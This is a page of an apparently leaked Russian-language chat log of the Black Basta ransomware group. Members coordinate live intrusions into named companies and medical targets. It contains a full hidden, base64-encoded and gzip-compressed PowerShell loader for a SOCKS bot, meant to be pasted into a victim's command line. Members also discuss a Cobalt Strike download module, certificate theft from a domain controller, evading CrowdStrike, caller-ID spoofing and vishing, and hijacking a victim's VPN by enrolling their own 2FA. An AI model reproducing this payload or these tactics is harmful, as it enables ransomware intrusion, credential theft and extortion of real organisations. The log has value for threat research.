BlackBasta Matrix Chat — страница 166 из 199
2024-05-07 17:09:56
@n3auxaxl:matrix.collectionofmanager.space
то что обсудить хотел
2024-05-07 17:10:07
Black Basta
++
2024-05-07 17:10:23
Black Basta
я обзваниваю пока
2024-05-07 17:10:28
Black Basta
хочу пока результ
2024-05-07 17:10:48
@n3auxaxl:matrix.collectionofmanager.space
+++
2024-05-07 17:10:49
@n3auxaxl:matrix.collectionofmanager.space
окей
2024-05-07 17:11:11
@n3auxaxl:matrix.collectionofmanager.space
все лето буду заниматься ботом, будет разные типы файлов, одни под масс
2024-05-07 17:11:16
@n3auxaxl:matrix.collectionofmanager.space
другие под точку
2024-05-07 17:11:25
@n3auxaxl:matrix.collectionofmanager.space
кароче должн обыть прикольно очень
2024-05-07 17:11:29
@n3auxaxl:matrix.collectionofmanager.space
функционал шире намного
2024-05-07 17:11:31
@n3auxaxl:matrix.collectionofmanager.space
скрины
2024-05-07 17:11:39
@n3auxaxl:matrix.collectionofmanager.space
и так далее
2024-05-07 17:20:57
@usernamenn:matrix.bestflowers247.online
Залейте себе, разархивируйте, добавьте CNA.
2024-05-07 17:20:59
@usernamenn:matrix.bestflowers247.online
acurl.zip
2024-05-07 17:21:32
@usernamenn:matrix.bestflowers247.online
Написали BOF для скачивания файлов по прямой ссылке, куда положить файл нужно указывать абсолютный путь.
2024-05-07 17:21:55
@usernamenn:matrix.bestflowers247.online
Добавите CNA, в кобе напишите команду:
2024-05-07 17:21:56
@usernamenn:matrix.bestflowers247.online
`help acurl`
2024-05-07 17:22:14
@usernamenn:matrix.bestflowers247.online
Принимает такие ссылки на скачивание:
2024-05-07 17:22:25
@usernamenn:matrix.bestflowers247.online
ну либо дефолтные
2024-05-07 17:26:29
@usernamemm:matrix.bestflowers247.online
```
2024-05-07 17:29:27
@nickolas:talks.icu
Что успел сделать ? Вижу что сетка ушла в офф.
2024-05-07 17:29:57
@nickolas:talks.icu
Хочу понять, какие действия к этом привели. Или пользователь сбрыкнул, или успел какие то активные действия с дц провести.
2024-05-07 17:34:17
Black Basta
Что успел сделать ? Вижу что сетка ушла в офф.
2024-05-07 17:34:24
Black Basta
или понять какие действия привели к этому
2024-05-07 17:34:32
Black Basta
приходия чай пись обсудим
2024-05-07 17:34:48
@nickolas:talks.icu
креды нашего пользователя судя по всему заблокировали.
2024-05-07 17:52:28
@usernamemm:matrix.bestflowers247.online
stop my all
2024-05-07 17:54:53
@nickolas:talks.icu
тук тук
2024-05-07 17:55:36
Black Basta
я тут
2024-05-07 17:55:38
Black Basta
делаю кое что
2024-05-07 17:55:42
Black Basta
скоро поговорим
2024-05-07 17:55:47
@nickolas:talks.icu
окей.
2024-05-07 17:56:01
@nickolas:talks.icu
как будет что то новое скину.
2024-05-07 17:56:11
Black Basta
я не делал шуму
2024-05-07 17:56:12
Black Basta
все чисто
2024-05-07 17:56:35
@nickolas:talks.icu
Ну может быть кроуд на что то среагировал, хочу понять, где в цепочке нужно искать проблему.
2024-05-07 17:57:12
Black Basta
серты запросил
2024-05-07 17:57:14
Black Basta
все было четко
2024-05-07 17:57:19
Black Basta
хотел уже сделать
2024-05-07 17:57:27
Black Basta
но не успел сокс отпал
2024-05-07 17:58:26
@nickolas:talks.icu
да, вот не знаю, может Crowd как то запалил, на звонке все было максимально четко.
2024-05-07 17:58:33
@nickolas:talks.icu
Может на дц произошло палево, блин не знаю
2024-05-07 17:59:58
@nickolas:talks.icu
Понял, будем думать - смотреть. Ну и в любом случае едем дальше
2024-05-07 18:02:00
@nickolas:talks.icu
Когда ты снимаешь серты, по сути ты взаимодействуешь с дц и центром сертификации, могут ли EDR или ISP замечать такие вещи и быстро зарезать коннекты.
2024-05-07 18:02:27
@nickolas:talks.icu
Нужно понять ответ на этот вопрос, от этого уже отталкиваться с дальнейшими тактиками
2024-05-07 18:07:22
@iamnurnazarov:matrix.org
закончил таблицу
2024-05-07 18:11:44
Black Basta
да
2024-05-07 18:12:04
Black Basta
все может быть
2024-05-07 18:12:05
Black Basta
я хз
2024-05-07 18:12:09
Black Basta
серты вообще не паляться
2024-05-07 18:12:16
Black Basta
это не кербы снять
2024-05-07 18:12:41
@nickolas:talks.icu
А как быстро после сертов упал сокс ?
2024-05-07 18:13:38
Black Basta
после получения самого серта
2024-05-07 18:13:44
Black Basta
я уже не смог получить хешь
2024-05-07 18:13:47
Black Basta
умер сразу же
2024-05-07 18:13:55
Black Basta
Crowd - мог отрегировать
2024-05-07 18:14:57
@nickolas:talks.icu
вот возможно, потому что вроде как все было ровно.
2024-05-07 18:15:28
@nickolas:talks.icu
видимо он как то заблокировал интернет, на тачке откуда была атака.
2024-05-07 18:20:15
Black Basta
ты когда звонишь подмену номера делаешь ?
2024-05-07 18:20:56
Black Basta
например звонишь им с самого главного номера
2024-05-07 18:24:00
@nickolas:talks.icu
подмена номера не работает уже с начала года
2024-05-07 18:24:12
Black Basta
работает
2024-05-07 18:25:04
@nickolas:talks.icu
=)
2024-05-07 18:25:20
@nickolas:talks.icu
мы тестировали, то что якобы работает )
2024-05-07 18:25:27
@nickolas:talks.icu
оно не работает, там пустой коллер приходит
2024-05-07 18:29:30
@nickolas:talks.icu
погнали
2024-05-07 18:29:56
Black Basta
тут ?
2024-05-07 18:30:06
@nickolas:talks.icu
```
2024-05-07 18:30:10
Black Basta
а у нас может быть реализован сокс бот в виде pw
2024-05-07 18:30:14
Black Basta
команды
2024-05-07 18:30:28
@nickolas:talks.icu
* ```
2024-05-07 18:30:37
Black Basta
```
2024-05-07 18:30:42
Black Basta
скрины
2024-05-07 18:30:53
@usernamejj:matrix.bestflowers247.online
> <@usernamegg:matrix.bestflowers247.online> ```
2024-05-07 18:30:59
Black Basta
`powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEALwA2ADEAWABhAFcALwBpAFMAaABiADkAbgBQAHcASwBmADQAZwBFAEsASQBSAG0AVAAvAEoARwBrAFoANwBCAEMANQBzAE4AMgBDAHoAQgBlAFYASABrAHAAWQBEAEMANQBhADEAYwBaAG4AdgBUAC8AMwAyAHUARABTAFQAcAA2AGYAUgBNAFMAegBPAFIAawBLAHYAcwB1ADUAdwA2AGQANgBrAGIASABiAEUANwBuAFYARgBzAE0AeQBWAHcARQBIAGMAMwBRAHoAVABHAGcAYwA5AFYAcgA2ACsAWABpAFcAKwB6AGQASgAwAHUAMwBsAGEASQB2AFkAVQAwAHMATgA5AE0AeAA2AEUAbwBqAHIAbQAvAHIANgA5AEcASgBqAFUAOQBMAG4AKwB6AE4AZQBtAGIARgB6AGcASgBRAFUAVQB1ADIANgBTAEMAeQBFAGsAbwBLAGwAeABkAFgAVgA5AGwAcgB4AEkALwBOAHAAZgBvAHoAVABjAFoAMwBxAEkAMwBEADcARgAxADQATQBUAGMARQA1AGQALwA0AGMATgBRAEMARAB3AFQAKwA2ADkALwAvAE4ARgBPAEsARQBVACsATwArADEATABNAG0ASgA4AEgAQwBQAFAASQBoAGoARgArAFEATAAzAFQAMgA2ACsAUgBoAFQAZABEAGEAMABOAHMAaABuADMATgAzAGYAegBWAHAASgBKAFkASgBuAGsATABIAFoAbwBtAC8AWQBhAFQAcwBIADcAVAB2AHAAdABFAE4AaABtAGUAbwBLAFMASABoAEwATQA4AHIAbQAvAC8AcwBvAFYAWAB1ADQAcQByAHkAVQB4AFMAawB3AFMANQAzAFAANgBJAFcAYgBJAEsAegBtAEUANQBBAHIAYwA5ADAATABxAGMASABJAEkAVQBUADYAbgBZAEoAcwBHAGMAYgBCAGsAcABUAG4AMgBhADkAWABTAE4ARQBPAHYAWgB1AEMAVgBFAC8AWgBjADQAWAB5AHkAVgBXAGoAQwBPAFgANQA5AHkATgBUAHEAUwBTAGUAZgBnACsAVQBJAHUATwBGAFAASABPAGEASwAzAEUAdgBxADcAKwBYADEAbABmAHYAegBIAFkAMgBXACsAQQB4ADcAcQBOAFQAMQBHAGEASgBCAHEAQwBPADYAeABUAGEASwBTAHgAMwBUAGQAdwBqAFMAMABCAEwAVQBjAGoASABFAHoARgAvAGwAQwBnAEMAQwBJAHAAWgBRAG4ANwB0AGcAQQBiADEAdAA0AEsATAA4AGoAWgA4AFEAVQBnAFMANwBMADcAOQByADkAegBXAHYAbwB0ADIARgAzAE4AOQBWAHkAbgA5AFcAQQBxAGsAUgBvADQAWABpAE8AUwBkACsAaAB3ADQAbAB5ADUAdQBUAE8AVABqAE8AVAArAGcALwBKAFYAYwBCAC8AbgA1AEsAcwBNAEwAMQA5ADYAOQBTADEAVQBFAEUAcgBVAHkARwAzAGgAagB3ACsAeQBsAFgAcgA2ACsAdQBYAHIASQBsAGcAdgBQAGsAUgAwAEcATQBNADcAMABuAHIAbAB6AGsARgBBAEIAaABzAG8AQQBlADAAbgBCAE8AYQBJAEkASwByAHgALwB4AE8AYgBtADkAYQBNAGIARgBYAHgAcQBxAFgATABUAE8ATwBxAGYAdwBuAEgAQQA4AGMAUwArAHoAQQBEAHUAdgAxADEAZQBGADYAMwBQADIAcABPAC8AZgByAEEAUQBUAEIAOQBIADAAKwA2ACsAcgBRAFUAQgBMADcAQwBQAGgANABKAHMAZQB0AGkAOABKAG4ALwA4AHEAWgBtAGgASgBVAE0AWgBIADYAUwBLAG0AQQBzADUAOAA3AHYAdwBCAE8AYwBLAFoAbgBWAHgASwA2AE0AdgBQAGEAcQBLAEgAMgBiAHQAdQA2AHcAUwBPAHQAeQBIAHUATQBhAEMAQwBsAEMAagA4AEMATwBZAFUAdwAzAHkAdQA2AHkAdgBJAEEALwA1AE8AZQAwAGoAVABtAHkAVwBVAEcAYgBwAEkAbgAwAHYAcgBjAFAARwBlADcAdABOAGMAYgBoAE0AegBqAG8AdgBjAEsASQBFADYAdAA0AHUAYwBqAGsAeQBDAG4AQwBMAEgAKwB6AEUAKwBmACsASQBUAEYAbQBUAEwAMwBBAGQAYwBKAFMARQBNADIAMgBiAE0ATAB1AFoAZQBDADEAOQBRAGUAbgBiAGQARABuAHkAbwBtAE0AUwBHADYAQQBJAE4ARQB6ADEARQBOAGoAWgBKAHkAawBxAFIANgAyAEEASAB0AFEANAA2AFgAbAAwAGcANQBMADcAawBwAEcAMABTAEEAaQBVAEgAbAByAFkAUQBFADMAaQBUAGMAcQBHAHoATgBHAGUAbwBVAC8AegAzAC8AQwBpAFUAZABNAFMANgBYAGsAaQBRAEIAOQBKAFoARgA1AEsASQB1AFkASwBlAGMANgA2AG8ATABOADMATQBGAFgASgB5AC8AdwBIADIAcABVADUATwBSAFoARgB5AGQAUwBIAHAARQAyAGgASQBBAEoAMABFAHIATQBqAE4ATQBHAFgAUQAxADMATABGAG4AeABMAHYAZgA0AFAAMwBZADQAdgA1AEEAVwBhAGIAbwBuAE0AZwA4ADEAawBoAGQAcABmAFEAMABFADkAZABBAE4AaQBKADgAUgBHAGEATQBZAHEANABoADAASgBhAGcAaQArAHQAQQAwAHQAcgA2AFcAYgA3AFoAcQBlAFgAegBkAE0ANwB6AFIAbQBwAGwASQBHAEsAUgBBAE8AdgBaAGMAYQBvAFcAZABlAHoARABwAGYAUAAxAGEAcgBKAGEAdgA4ADQARwBqAFEAUAB5AHEAWgBiADcAUgAwAFcAdgByAHEAMwAvAFIAawBWAHQANQBKAHMATgB0AGYANwBjAFQAVQBKADcAQQBtAGoAVQBVAGMAVQBZAEsALwBaADEAVABnAG0ATQBnAG0AdAA5AFMAQQB5ADkANABQAE4AWgB2AC8AWQBmAGoANgBJAEkANwA0ADYAdwBFADMAYwB3AE4AMQBrADAARAByADYARQByAFkAOQAwAEIAcwBQAGcANABYADIAUwBMAHQAYgBWAFEAcABJAGYATgA5AHYAUwAvAE8AcABpAFQAZABSADUAaQB2AHgANgBoAFYASABOAEEAKwBEAG8AOQAxAGMAMAAyAEUAVgBCAFkAdQBkAEcAbgBXADMASQA5ADYAWgBiACsAMgBtADEAdwArAGsASgBnAFAAZABXAFMASQBtAEkAUgBXAFQANABXAGkAUgBEAEsASwBCADEAOABYADEAOQBWAGEAWQBzAGQANgAyAEsAegA5ADAAKwB0AFcARgArAFUAQwBzAGUANQBUAHAATwAxAEgAcQBhAHgARwB0AHQAbQBhADYAUAB6ADYAbQBlAHgAeQAxAEUAVQAzADkATABJAEIANwBWAEsAcwAwADAAYgB4ADMAdgAvAEIARABqAE8AYgBKADYAcgBoAFQAcwBlADAAYwBCAFYAVAB0AHcAZgBzAGsAVQBPAHcAdwByAHEAbABIAGUAKwBtADYARwB6AE8AcwBUAEgAVwAzADAAcAA5AE0AagBXAGYAZwBwAG0ASgBHAFYATABLAGEAVgBGACsARQBaAEQAdgBqAHAAMgA1AHQAWgBOAEEATQAyADEAWQBDAGoARwBxAEsARQA5AHYAVgAzAG4ARQBSAHUAbwBZAHoAaQA4AFQAYQB5AE8AcgBIAGIAVABoAHIAagBkAEEAbwA2AFcARwB2AHMAYwBMAGQAdwAxAG4ATwA2AHgAMQAwAHYAUQBYAFAAdgB1AEgAMABvADQAZQBHAGMANgB3AGUAcABMAEIAdQBOAGkAawBHAFgAdgBmAGcANgB6ADcAbAAyAEoANwBHAEcAeABFAE4AZgBmAHQAWgB3AHAANgA5AHIAZwByAGEAeABuADcAMABrAHEAZwBCADIATwBzAGQAdABkAGQALwAzAHQATwBJADkAWQAxAFIANgBxAGYAcwBiAHYAUwBtAE0AZwBZAGYAVQBSAFMAcgBHAEgAcgBIAEIAdABiAFkAbQB4AGwAawBhAHoANQBuAGUAbQBYADQAMwBjADYAcABXADMAOAA4ADIAagBWADEAbgAyAEwAWgAyAC8ATwArAEkAZQBEAHAALwBWAHcAOQBWAHMATgBFAGkAVQBOAGEAVAAzAEgAUwAyAG4AQQBYAGgAOAAwAEgAVwBJACsANgByAGsASQA3AFgAYQB4AHMARABzADAATwA2AE8AMgBVAGkAVwB1AE0AcAAyAEoAUAAxAEEAaQB2AFcASwA2AGoANgBuAHUAMQBiAFkAagB1AFQASwA2AE8ASgArAE8AMgAyAGwAbgBMADAALwBFAG0AVQBPADAAUgBHADcAYwA4ADEAdQBxAGkAbgBSAFcAMQBiAC8AdQBWAFgAYgAxAGoAVwBJAEgAVgBXACsAMgBIAHcAMABWAEQALwBMAGEAOABqAFYAegBOAGoAOQBxAGIANwBiAFkANQBEAGgAdAB5AFYAUABFAGUAUgBLAHYAcwA2AFMAMgB6AEUAVABWAG4AOQA4AEEANwBQAHgAYQBOAHkAVwB6AHYAQwB1ADMAeAByAGoAZgBBAEIASQAvAEYAbABqAHkAdAAyAEUATwByADMARgBNADEAeQBXAGgAcgA0AHMATABnAHkANABZAHEAKwBNAFoATwBnAEsAYwBzAGQAWgBHADQASwA4ADgALwB5AHgAcAB1AGgAWgArAEkARABzAFIAeQBEAEwASwBhAG8AUgBOAGwAeABKAGMAZABXAFoAcwArAHQAbQBmAGwAUgBkAEsAZgB0ADUAVABKAHQAQwBLAFAASgBaAEEAUgB5AHkARABUAEcAawAyAGsAbABnAHcAMgA3AGcAWABmAGsAYQBlAFMAYgBmAEEAMQBiAFQAQwByAEcAcgBYAHgAZABQAEcAcwBUAFMAdAAwAFQARgBoAFYAeAB2AFgAUQBJAGUAQgBqADMATQBDAGEAYQBLAGcAcABUAHMAdgBkAEcANwByADcATwBCAHEAdgBkAG4ATgBCAFUANABSADIAVABRAE8ALwBqAGoASwBUAGUATQBGADYAdABnAFYAeAByAGEAagBpAGYAaQBVADQAWQBxAGgASwBtAHIAMwBnAEsALwBGAE0AZwByADEARwBwAFAAYgBjAGwAUwBTADkAdgBGAGoAdwBOAFUAZgBUAFgAVQBlAGUAegBHAHgARgA0AHMAcwBUAG0AVgBlADEAbQBlAGIAcQA0AHEAbwA4AGEAYQAvAFUAawBlADYAdQBaAGIANgBxAHkAVwBNAHcATgBzAEQAdQBwAGwAOQA3ADYASQAyAHAATQBEAFEAOQA0ADkAbgBiAHgAWgBzAGsASgBGAFoAVQArADIAYgBLAFYARwBXAE0AeABpADMAMgBxAEQAcgBpAG8AQgBKAGEALwBrAFAAYwBGADYAZQByAGcALwBSAHQASQBhAGoANgBiAFcAQgBOAFUASABOAHYAMQBjAEsAMQByAGoAVQA5AFEAcgBWAHkAYgA3ADkAWQAzADAANABpAFUAKwA1AGoAOQBDAEQAMQA3AEoAawBUAE4AYgA3AGQANwBqAHAATAByAFgARwBNAGgAZgByAGMANgBwAFUAaABwADMAeABuAE8ARgA4ADkAcAB6AGsAVgA2ADgAMwBRAGgAWABwAFcATgBvAHMAdwAzAGkAaQBIADkAQgBsAEMAMwBxAFYAUABjAHIAKwB1AEMAWABKAGEASgAzAEcAbgB0AFkAUABjAEYAdQBHAG4AdwA2ACsAUgB5AHYASQBnAEEAMwBsAHUAUQByADMAcwBtAFUAbABiAHEAVgB3AHcAdABJAFUAdwBVAFoALwBKAGQAQgA3ADAANQBCAGoAWAArADkAWgBtAHQAdABYAHUAVQBZADMAUgBIAHUAUQBmADUATwBXAHgAcgBqAEMANwB4AG8ANgAyAHUAQgA1AFAAQgBLADAANwBoAGwAagByAGsAcgBZAEEATABvAE8ATgBnAFcAawBmAHIANQA2AGUAcwBzAGEANgBEAEMAagBNAFMAcwBkAGoATwBvAEQAOABnADAAcwBYAGQANABSAHgANQB3AFkASgBiAFIARwBhAGMAZgBiADYAOQBqAGIAcgBvAEYAZgBuAEwAeQAvAHcANgBqAFUAYgBPAGoAOQB0ADcANgB3ADkAVwBLAHMAMQByAHEAKwArAFgANABhAEwAcgBmAG0AcAB5AGYANQBxAGwARgBOAE0ARwBxADkATgBBAHMAMABYAHgAcgBIAEwAWgBTAG8ARgBWAEQAbwBQAFYAYQBNAEEAcAB4AHIANQAvAE4AZgAvAEIANwBpAEkAKwBvAGoAQQBqAEEAeABUADkATwBVAEsANABnAGsASgA3AEgAUQBNAC8ATQBVADgAOQB1AGYANwBKAFEARgBYADcAUgBTAFcAdABlAHEAWABxADgATABIAGIAVgBJAG8AWABPADUASgBLADEAawB1AHMAMQBuAHAAZgBNAFQATAB5AFAAaAB4ADcAeABoAHcAdgB1AEkANwBpAHcAUABrAHIAOQBpADYAeQBKAFgAMwB0AFgASwA1AG4ARAA3AHIAWgBiAEQAMQArADcAUwAwAGcALwBDAFEAUAAxAHMAcgBwAG8AUABpAEoAeABnAGYAYgBrAGoAbQA1AG4AMgB1AG8ANABuAHYAbwBmADgAagArAHoALwA0AC8ATwArADgAcABzAHgAbABvACsAWQBIAGIAeABtAGkAcgA4AGwASwA3ACsANQAvAEEAZAA3AGEAUQBRAHMASwBEAGcAQQBBACIAKQApADsASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAJABzACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsACgA=`
2024-05-07 18:31:03
Black Basta
в таком ввиде
2024-05-07 18:31:18
Black Basta
что бы просто вставил в cmd или pw и все
2024-05-07 18:31:26
Black Basta
сокс стучит
2024-05-07 18:31:47
@tinker:matrix.bestflowers247.online
привет! ну как тебе моя идея?
2024-05-07 18:32:03
Black Basta
ну слишком
2024-05-07 18:32:05
Black Basta
проще надо
2024-05-07 18:32:11
Black Basta
без имен и сумм
2024-05-07 18:32:14
Black Basta
исправь
2024-05-07 18:32:30
@tinker:matrix.bestflowers247.online
та не, я имел в виду общая идея делать кастомные
2024-05-07 18:32:41
@tinker:matrix.bestflowers247.online
простую общую сейчас пришлю
2024-05-07 18:34:39
@nickolas:talks.icu
image.png
2024-05-07 18:34:53
Black Basta
image.png
2024-05-07 18:35:02
@nickolas:talks.icu
image.png
2024-05-07 18:35:16
Black Basta
image.png
2024-05-07 18:35:44
@nickolas:talks.icu
image.png
2024-05-07 18:35:44
@tinker:matrix.bestflowers247.online
Hello!
2024-05-07 18:35:53
Black Basta
image.png
2024-05-07 18:35:58
@nickolas:talks.icu
image.png
2024-05-07 18:36:12
Black Basta
Hello!
2024-05-07 18:36:43
Black Basta
+++
2024-05-07 18:36:48
Black Basta
вот это хорошо
2024-05-07 18:36:56
@nickolas:talks.icu
image.png
2024-05-07 18:37:19
Black Basta
image.png
2024-05-07 18:37:24
Black Basta
image.png
2024-05-07 18:41:02
@usernamejj:matrix.bestflowers247.online
> <@usernamegg:matrix.bestflowers247.online> ```
2024-05-07 18:41:16
Black Basta
socks перестал работать, даже креды не успел проверить
2024-05-07 18:41:21
Black Basta
что то у вас там сломалось
2024-05-07 18:41:36
Black Basta
сервер может поменять от сокс бота ?
2024-05-07 18:41:40
Black Basta
палится уже
2024-05-07 18:41:49
Black Basta
что то не так
2024-05-07 18:41:49
@nickolas:talks.icu
да с этим таргетом почему то и цмд плохо работает
2024-05-07 18:41:51
Black Basta
брат
2024-05-07 18:41:55
@nickolas:talks.icu
я думаю он висит, он тяжко
2024-05-07 18:42:01
@nickolas:talks.icu
да, завтра уже поменяем сервак
2024-05-07 18:42:11
@nickolas:talks.icu
вообще надо на майкрософте в azure его сделать
2024-05-07 18:43:49
@nickolas:talks.icu
там все красиво сделали, возможно поднимется.
2024-05-07 18:49:05
@nickolas:talks.icu
креды от сузаны живые
2024-05-07 18:51:27
Black Basta
вообще надо на майкрософте в azure его сделать
2024-05-07 18:51:57
@nickolas:talks.icu
у меня есть впнки
2024-05-07 18:51:59
@nickolas:talks.icu
гы гы гы
2024-05-07 18:52:20
@nickolas:talks.icu
image.png
2024-05-07 18:53:23
Black Basta
это кто
2024-05-07 18:53:44
@nickolas:talks.icu
> <@nickolas:talks.icu> ```
2024-05-07 18:53:59
Black Basta
image.png
2024-05-07 18:54:08
Black Basta
www.hain.com
2024-05-07 18:55:24
@usernamejj:matrix.bestflowers247.online
то есть в azure socks поднимут?
2024-05-07 18:58:05
@nickolas:talks.icu
нашел в чем траблы, решим проблему быстрых отпадов
2024-05-07 18:58:09
@nickolas:talks.icu
сменим технику чуть
2024-05-07 18:59:21
@nickolas:talks.icu
как уйдет домой, подключимся к ее впн, у меня есть 2фа, и сделаем все.
2024-05-07 19:00:21
@nickolas:talks.icu
Будешь ночью кртуить их через впн ?
2024-05-07 19:03:23
Black Basta
да
2024-05-07 19:03:32
Black Basta
а как ты 2фа получишь
2024-05-07 19:03:44
Black Basta
код действует минуту
2024-05-07 19:08:59
@nickolas:talks.icu
я свой поставил 2фа уже =)
2024-05-07 19:09:12
@nickolas:talks.icu
если кипиша не будет, я залечу туда без проблем )
2024-05-07 19:09:43
Black Basta
есть впна от них
2024-05-07 19:09:58
Black Basta
есть 2фа от них своя уже
2024-05-07 19:10:03
Black Basta
можно залетать
2024-05-07 19:10:08
Black Basta
шустро
2024-05-07 19:10:25
@nickolas:talks.icu
Все, у меня картинка сложилась как надо действовать)
2024-05-07 19:10:34
@nickolas:talks.icu
Что бы сессии не умирали
2024-05-07 19:10:37
Black Basta
как ?
2024-05-07 19:10:46
@nickolas:talks.icu
ну все через фейки
2024-05-07 19:10:50
@nickolas:talks.icu
никаких холодных звонков
2024-05-07 19:12:27
@nickolas:talks.icu
все должно быть тихо спокойно и красиво, тогда не будет шухеров
2024-05-07 19:16:59
Black Basta
без звонка
2024-05-07 19:17:05
Black Basta
просто отпраивли фейк ?
2024-05-07 19:18:11
@nickolas:talks.icu
все со звонками
2024-05-07 19:18:28
@nickolas:talks.icu
просто фейк шляпа полная, они уйдут с него через 30 секунд и ничего, что нужно не дадут
2024-05-07 19:19:34
Black Basta
ладно посмотрим что выйдет
2024-05-07 19:19:39
Black Basta
но я не до поздна сейчас
2024-05-07 19:19:55
@nickolas:talks.icu
ну смотрите сами)
2024-05-07 19:20:03
@nickolas:talks.icu
там ярдник, у меня доступ к впн + валдиные креды )
2024-05-07 19:20:24
@nickolas:talks.icu
через 1-2 часа можем начать крутить
2024-05-07 19:20:30
Black Basta
ну это изи катка
2024-05-07 19:20:33
Black Basta
во сколько ?
2024-05-07 19:20:45
Black Basta
через 1-2 часа можем начать крутить
2024-05-07 19:20:52
Black Basta
там все готово
2024-05-07 19:20:56
Black Basta
надо ждать когда он уйдет
2024-05-07 19:21:01
Black Basta
иди пока отдыхай
2024-05-07 19:21:21
Black Basta
```
2024-05-07 19:21:56
@nickolas:talks.icu
15:20
2024-05-07 19:22:02
@nickolas:talks.icu
* 15:20
2024-05-07 19:22:06
@nickolas:talks.icu
у нее сейчас такое время
2024-05-07 19:22:17
@nickolas:talks.icu
раньше чем в 17-18 нет смысла лезть в впн, спалимся
2024-05-07 19:23:51
Black Basta
хорошо
2024-05-07 19:23:58
Black Basta
ночью он может тачку выключить
2024-05-07 19:24:06
Black Basta
ну если что его тачка не нужна
2024-05-07 19:24:22
Black Basta
главное что бы впнки креды были рабочи и был ip куда конектить
2024-05-07 19:24:27
@nickolas:talks.icu
а зачем нам тачка )
2024-05-07 19:24:44
Black Basta
незачем
2024-05-07 19:24:48
@nickolas:talks.icu
только если снимать чет с нее под юзер кредами, дк ты нихера там ине снимешь )
2024-05-07 19:25:06
@nickolas:talks.icu
короче методов крутить по сути дохера и больше
2024-05-07 19:25:20
Black Basta
завтра нужно договориться во сколько сбор
2024-05-07 19:25:25
Black Basta
на медиков
2024-05-07 19:25:30
Black Basta
у нас только они на завтра ?
2024-05-07 19:26:15
Black Basta
там какие вреды от впнки ?
2024-05-07 19:26:18
@usernamecc:matrix.bestflowers247.online
пока да.. но постараюсь еще одну разобрать
2024-05-07 19:26:19
Black Basta
юзерка ?
2024-05-07 19:26:34
Black Basta
какау? у кого ?
2024-05-07 19:26:40
@nickolas:talks.icu
там креды одни и для винды, и для почты и для впн
2024-05-07 19:26:44
Black Basta
ты поставил выкачку по медикам ?
2024-05-07 19:26:56
@usernamecc:matrix.bestflowers247.online
нет сейчас ставим еще ни одной ссылки не поставил
2024-05-07 19:26:57
@nickolas:talks.icu
я вижу приложение впна в мс, можно провалится из него в коннект
2024-05-07 19:27:16
Black Basta
> <@nickolas:talks.icu> там креды одни и для винды, и для почты и для впн
2024-05-07 19:27:58
@nickolas:talks.icu
image.png
2024-05-07 19:27:58
@nickolas:talks.icu
вот так вот =)
2024-05-07 19:28:18
@nickolas:talks.icu
Ну ты еще не понял как работает ССО и для чего оно в больших корпах
2024-05-07 19:28:22
@nickolas:talks.icu
это же пиздец ДЫРА!!!
2024-05-07 19:28:30
Black Basta
фортик
2024-05-07 19:28:34
@nickolas:talks.icu
ну да
2024-05-07 19:28:43
Black Basta
> <@nickolas:talks.icu> Ну ты еще не понял как работает ССО и для чего оно в больших корпах
2024-05-07 19:28:53
@nickolas:talks.icu
> <@nickolas:talks.icu> sent an image.
2024-05-07 19:29:00
@nickolas:talks.icu
увидишь
2024-05-07 19:29:02
Black Basta
я Okta чекал
2024-05-07 19:29:21
@nickolas:talks.icu
ну окта это минималка ))))
2024-05-07 19:29:24
@nickolas:talks.icu
МС вещь )
2024-05-07 19:30:38
@usernamejj:matrix.bestflowers247.online
хорошо
2024-05-07 19:30:49
Black Basta
хорошо
2024-05-07 19:30:51
Black Basta
посмотрим
2024-05-07 19:31:15
Black Basta
понял
2024-05-07 19:31:52
@usernamemm:matrix.bestflowers247.online
добавил в лист, смотрю ее тоже, чтобы побыстрей было
2024-05-07 19:32:04
@usernamemm:matrix.bestflowers247.online
а там посмотрим
2024-05-07 19:32:17
@nickolas:talks.icu
image.png
2024-05-07 19:32:28
Black Basta
++
2024-05-07 19:33:04
Black Basta
ну а где иконца форти
2024-05-07 19:33:08
Black Basta
на главном скрине
2024-05-07 19:33:10
Black Basta
я не вижу
2024-05-07 19:33:23
@nickolas:talks.icu
image.png
2024-05-07 19:33:25
@nickolas:talks.icu
красное это форти!
2024-05-07 19:33:44
@nickolas:talks.icu
3 разных профиля впна есть, я проваливаюсь туда сразу, без авторизации
2024-05-07 19:33:54
Black Basta
> <@nickolas:talks.icu> sent an image.
2024-05-07 19:34:13
Black Basta
это разные достпуы ?
2024-05-07 19:35:20
@nickolas:talks.icu
это один доступ
2024-05-07 19:35:33
@nickolas:talks.icu
я там видимо не промотал ))
2024-05-07 19:35:52
Black Basta
imag123123e.png
2024-05-07 19:36:04
Black Basta
аа
2024-05-07 19:36:06
@usernamecc:matrix.bestflowers247.online
можешь yy позвать?? нам надо webdav привязать на этот сервак который есть с доменом. не качается а то. сейчас я ему скину данные ему
2024-05-07 19:36:25
Black Basta
ок
2024-05-07 19:36:26
Black Basta
ща
2024-05-07 19:39:19
Black Basta
hain.com - это херь очень хорошо должна заплатить
2024-05-07 19:39:34
Black Basta
у нас были подобные ребята
2024-05-07 19:40:10
@nickolas:talks.icu
да сделаем их
2024-05-07 19:40:12
@nickolas:talks.icu
щас дам сетку
2024-05-07 19:40:25
Black Basta
++
2024-05-07 19:41:22
@nickolas:talks.icu
лолкальный админ
2024-05-07 19:44:52
@nickolas:talks.icu
```
2024-05-07 19:45:09
@nickolas:talks.icu
Тут локальный админ, и у нас на тачке есть сессия РММ
2024-05-07 19:46:44
@nickolas:talks.icu
image.png
2024-05-07 19:48:17
@nickolas:talks.icu
image.png
2024-05-07 19:51:12
@nickolas:talks.icu
аууу
